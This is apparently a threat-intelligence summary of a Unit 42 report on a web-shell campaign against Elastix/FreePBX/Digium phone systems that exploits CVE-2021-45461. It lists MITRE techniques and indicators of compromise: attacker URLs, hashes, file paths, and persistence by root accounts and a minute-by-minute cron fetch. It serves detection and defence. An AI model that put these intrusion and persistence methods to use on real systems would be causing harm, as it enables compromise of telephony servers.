Unit 42 describes a campaign targeting Elastix/Digium phones where a PHP web shell is implanted to exfiltrate data and fetch additional payloads. The activity links to a Rest Phone Apps RCE (CVE-2021-45461) and is mitigated by Palo Alto Networks WildFire and Threat Prevention. #INJ3CTOR3 #Digium #Asterisk #Elastix #FreePBX #Sangoma #CVE-2021-45461 #ZenharPanel #ZenharR
Keypoints
- Observered over 500,000 unique samples of the Digium/Elastix web-shell family from Dec 2021 to Mar 2022 targeting Digium’s Elastix/OpenPBX ecosystem.
- The attacker implants a multi-layer obfuscated PHP web shell to exfiltrate data and download/execute additional payloads inside FreePBX/Digium phone software.
- The web shell uses an MD5 authentication hash tied to the victim’s IPv4 address and supports admin, cmd, and call operations with built-in commands.
- Initial access leverages CVE-2021-45461 (Rest Phone Apps RCE) in the restapps module, enabling remote code execution via a crafted URL parameter.
- Persistence is achieved through creation of root user accounts and a scheduled task that fetches and runs a remote script every minute.
- IoCs include remote URLs, original shell SHA256 hashes, local file paths, and unique strings such as ZenharPanel and Ask Master.
MITRE Techniques
- [T1505.003] Web Shell – The attacker installs a PHP web shell backdoor and uses it to run commands and maintain access. ‘The PHP web shell contains random junk comments, in an attempt to evade signature-based defenses. Additionally, it is wrapped in multiple layers of Base64 encoding, in order to mask its true intent.’
- [T1190] Exploit Public-Facing Application – CVE-2021-45461 enables remote code execution via the Rest Phone Apps module. ‘This vulnerability lies in the Rest Phone Apps (restapps) module, allowing for a URL variable to potentially get passed, resulting in a remote code execution (RCE) scenario.’
- [T1053.005] Scheduled Task – Persistence by scheduling a task that runs every minute to fetch and execute a remote script. ‘Adds a scheduled task entry.
Runs every minute.’ - [T1136] Create Account – Persistence via creation of new root user accounts (sugarmaint and supports). ‘Creation of root user accounts.’
- [T1027] Obfuscated/Compressed Files and Information – Use of Base64 encoding layers to hide payloads. ‘There are always 14 lines of code, wrapped in multiple layers of Base64 encoding to hide certain key areas.’
- [T1105] Ingress Tool Transfer – Downloading and executing additional payloads from remote infrastructure. ‘The dropper variant fetches and executes a remote script from the attacker’s infrastructure: IPv4 address 37.49.230.74.’
Indicators of Compromise
- [URL] Remote URLs – The attacker fetches payloads from remote URLs: hxxp://37.49.230.74/k.php, hxxp://37.49.230.74/z/wr.php, hxxp://37.49.230.74/z/post/noroot.php, hxxp://37.49.230.74/z/post/root.php
- [SHA256] Original Shell Scripts – Hashes: 000a3688455edacc1dac17539797dc98f055091898a65cd520fb8459c1bc2a2a, 0012342749e3bae85a9269a93661e2eb00437c71b2bca2eaca458147f9fe8471, 001305bd3be538e50014d42f02dee55056b73a1df770e2605aded8a970091f2f, 0050232e04880fbe1d0c670b711b66bb46c32febdc9513074612c90f1f24631b, 0059d7b736dc1e61bd5b22fff601579fbc8a12b00981fdd34fd13f0fb44688b0, 0088cba19eec78daee0310854c4bf8f7efc64b89bdc7517f0a1c7ebbba673f72
- [Filepath] Local Filepaths – /var/www/html/admin/assets/ajax.php, /var/www/html/admin/assets/config.php, /var/www/html/admin/assets/js/config.php, /var/www/html/admin/modules/core/ajax.php, /var/www/html/digium_phones/ajax.php, /var/www/html/rest_phones/ajax.php
- [String] Unique Strings – ZenharPanel, ZenharR, Ask Master
Read more: https://unit42.paloaltonetworks.com/digium-phones-web-shell/